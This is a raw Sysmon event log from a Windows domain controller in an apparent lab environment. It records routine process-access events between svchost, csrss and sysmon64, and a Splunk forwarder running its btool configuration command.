13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3A00-000000009101}3808C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8552-5FCF-4500-000000009101}38283800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8551-5FCF-3A00-000000009101}3808C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.196{10ACEC4A-8552-5FCF-4600-000000009101}3808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8552-5FCF-4500-000000009101}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4500-000000009101}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4500-000000009101}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8552-5FCF-4400-000000009101}26603820C:\Windows\system32\cmd.exe{10ACEC4A-8552-5FCF-4500-000000009101}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.189{10ACEC4A-8552-5FCF-4500-000000009101}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8552-5FCF-4400-000000009101}2660C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4400-000000009101}2660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 